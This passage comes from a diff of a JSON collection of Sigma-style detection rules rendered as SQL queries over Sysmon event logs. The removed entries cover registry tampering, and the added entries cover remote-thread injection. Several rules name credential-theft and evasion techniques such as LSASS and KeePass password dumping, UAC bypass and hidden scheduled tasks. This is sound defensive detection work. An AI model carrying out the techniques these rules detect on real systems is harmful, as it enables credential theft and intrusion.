'\\')" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Bumblebee Remote Thread Creation", + "id": 
"994cac2b-92c2-44bf-8853-14f6ca39fbda", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "description": "Detects remote thread injection events based on action seen used by bumblebee", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + 
"attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 
'%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE 
'%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' 
ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE 
'%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Outlook 
EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", - "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - 
"attack.t1548.002" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE 
'%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA 
GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", + "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "New File Association Using Exefile", - "id": 
